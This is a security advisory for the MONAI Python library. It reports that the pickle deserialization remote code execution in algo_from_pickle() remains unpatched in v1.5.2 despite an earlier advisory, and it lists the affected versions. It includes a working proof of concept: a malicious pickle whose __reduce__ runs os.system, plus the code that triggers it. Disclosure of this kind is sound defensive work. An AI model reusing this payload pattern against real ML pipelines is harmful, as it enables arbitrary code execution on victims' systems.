GHSA-qxq5-qhx6-94qw

Suggest an improvement
Source
https://github.com/advisories/GHSA-qxq5-qhx6-94qw
Import Source
https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/08/GHSA-qxq5-qhx6-94qw/GHSA-qxq5-qhx6-94qw.json
JSON Data
https://api.osv.dev/v1/vulns/GHSA-qxq5-qhx6-94qw
Aliases
Published
2026-08-18T20:22:30Z
Modified
2026-10-01T09:25:41Z
Severity
  • 7.8 (High) CVSS_V3 - CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H CVSS Calculator
Summary
Incomplete Fix in MONAI: algo_from_pickle() pickle.loads() RCE still present in v1.5.2 despite GHSA-89gg-p5r5-q6r4 claiming patch
Details

Summary

GHSA-89gg-p5r5-q6r4 claims the pickle deserialization vulnerability in algo_from_pickle() was fixed in v1.5.2. However, monai/auto3dseg/utils.py has not been modified since 2024-07-12 — 18 months before v1.5.2 was released (2026-01-29). All three pickle.loads() calls remain unchanged. The fix was never implemented.

Vulnerable Code

File: monai/auto3dseg/utils.py (last commit: 2024-07-12, unchanged in v1.5.2)

def algo_from_pickle(pkl_filename: str, ...):
    with open(pkl_filename, "rb") as f_pi:
        data_bytes = f_pi.read()
    data = pickle.loads(data_bytes)          # SINK 1 — line 321, RCE fires here

    # isinstance/key checks happen AFTER deserialization — already too late

    algo_bytes = data.pop("algo_bytes")
    ...
    if len(template_paths_candidates) == 0:
        algo = pickle.loads(algo_bytes)      # SINK 2 — line 350
    else:
        for p in template_paths_candidates:
            algo = pickle.loads(algo_bytes)  # SINK 3 — line 356

No Unpickler subclass, no find_class restriction, no allowlist.

Why the Fix is Incomplete

- monai/auto3dseg/utils.py last commit: 2024-07-12 ("drop python 3.8")
- v1.5.2 released: 2026-01-29 — release notes contain no pickle-related changes
- v1.5.1 and v1.5.2 contain identical code at lines 321, 350, 356
- GHSA-89gg-p5r5-q6r4 references a Zip Slip fix (unrelated) as the patch

PoC

import pickle, os

class Exploit:
    def __reduce__(self):
        return (os.system, ('id > /tmp/rce_proof.txt',))

# Craft malicious pkl
data = {"algo_bytes": pickle.dumps(Exploit()), "template_path": None}
with open("/tmp/evil.pkl", "wb") as f:
    f.write(pickle.dumps(data))

# Trigger — monai/auto3dseg/utils.py lines 319-350 verbatim
with open("/tmp/evil.pkl", "rb") as f:
    data = pickle.loads(f.read())        # SINK 1 fires — RCE here
algo = pickle.loads(data["algo_bytes"])  # SINK 2 fires

print(open("/tmp/rce_proof.txt").read())
# uid=1000(user) gid=1000(user) groups=...

Verified on monai v1.5.2 (utils.py verbatim source):
[+] RCE CONFIRMED via algo_from_pickle():
    desktop-5657tb1\woong

Impact

Any application or ML pipeline calling algo_from_pickle() with an
attacker-supplied file path is vulnerable to full RCE. Medical AI workflows
frequently exchange model checkpoints, making this a realistic attack vector.
Database specific
{
    "cwe_ids":  [
        "CWE-502"
    ],
    "github_reviewed":  true,
    "github_reviewed_at":  "2026-08-18T20:22:30Z",
    "nvd_published_at":  null,
    "severity":  "HIGH"
}
References

Affected packages

PyPI / monai

Package

Affected ranges

Type
ECOSYSTEM
Events
Introduced
0 Unknown introduced version / All previous versions are affected
Fixed
1.6.0

Affected versions

0.*
0.0.1
0.1.0
0.2.0
0.3.0
0.4.0
0.5.0
0.5.1
0.5.2
0.5.3
0.6.0
0.7.0
0.8.0
0.8.1
0.9.0
0.9.1
1.*
1.0.0
1.0.1
1.1.0
1.2.0
1.3.0
1.3.1
1.3.2rc1
1.3.2
1.3.3rc1
1.4.0rc1
1.4.0rc2
1.4.0rc3
1.4.0rc4
1.4.0rc5
1.4.0rc6
1.4.0rc7
1.4.0rc8
1.4.0rc9
1.4.0rc10
1.4.0rc11
1.4.0rc12
1.4.0
1.4.1rc1
1.5.0rc1
1.5.0
1.5.1
1.5.2rc1
1.5.2

Database specific

source
"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/08/GHSA-qxq5-qhx6-94qw/GHSA-qxq5-qhx6-94qw.json"